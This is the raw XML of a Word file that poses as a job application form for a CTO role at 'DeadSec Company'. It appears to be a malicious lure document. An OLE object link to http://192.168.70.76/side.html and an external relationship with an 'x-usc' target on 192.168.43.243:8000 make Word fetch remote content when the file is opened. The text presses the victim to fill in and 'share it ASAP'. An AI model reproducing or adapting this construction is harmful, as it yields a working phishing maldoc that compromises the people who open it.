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F7079" w14:textId="4600924C" w:rsidR="00642844" w:rsidRDefault="0064284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</w:p>
    <w:p w14:paraId="720AA3DA" w14:textId="089D5778" w:rsidR="00642844" w:rsidRDefault="002B667E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 xml:space="preserve">Application for CTO Role in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>DeadSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> Company</w:t>
      </w:r>
      <w:r w:rsidR="007E0FA4"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4" o:title="" cropbottom="64444f" cropright="64444f"/>
          </v:shape>
          <o:OLEObject Type="Link" ProgID="http://192.168.70.76/side.html" ShapeID="_x0000_i1025" DrawAspect="Content" r:id="rId5" UpdateMode="OnCall">
            <o:LinkType>Picture</o:LinkType>
            <o:LockedField>false</o:LockedField>
            <o:FieldCodes>\f 0</o:FieldCodes>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF66ACD" w14:textId="6CC7A031" w:rsidR="00642844" w:rsidRDefault="002B667E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>Thank you for applying on our </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>website</w:t>
      </w:r>
      <w:r w:rsidR="007E0FA4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Please fill below table and share it ASAP.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3"/>
        <w:gridCol w:w="4353"/>
      </w:tblGrid>
      <w:tr w:rsidR="002B667E" w14:paraId="61C18DEF" w14:textId="77777777" w:rsidTr="002B667E">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4353" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B1653F8" w14:textId="3D880DBE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Full Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4353" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62A032E0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2B667E" w14:paraId="291BF9F6" w14:textId="77777777" w:rsidTr="002B667E">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4353" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="596EFFC3" w14:textId="4FD67DAE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Current Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4353" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1256B1F0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2B667E" w14:paraId="6B409E83" w14:textId="77777777" w:rsidTr="002B667E">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4353" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31510DDD" w14:textId="6C5BCF7C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Years of Experience</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4353" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D8D934E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2B667E" w14:paraId="267D6AAE" w14:textId="77777777" w:rsidTr="002B667E">
        <w:trPr>
          <w:trHeight w:val="901"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4353" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="290E0087" w14:textId="1CB2F4DC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Why you want to join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DeadSec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4353" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1936F51D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EF309B1" w14:textId="77777777" w:rsidR="002B667E" w:rsidRDefault="002B667E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</w:p>
    <w:p w14:paraId="3BEC24AD" w14:textId="4FAD4A19" w:rsidR="00642844" w:rsidRDefault="00642844">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pP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44"/>
    <w:rsid w:val="002B667E"/>
    <w:rsid w:val="00642844"/>
    <w:rsid w:val="007E0FA4"/>
    <w:rsid w:val="008D26F4"/>
    <w:rsid w:val="00A02EAC"/>
    <w:rsid w:val="00E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59"/>
    <w:rsid w:val="002B6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s://192.168.43.243:8000/uddi.html!x-usc:https://192.168.43.243:8000/uddi.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.wmf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Consumers Association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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-01T04:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-01T04:26:00Z</dcterms:modified>
  <dc:language>en-US</dc:language>
</cp:coreProperties>
</file>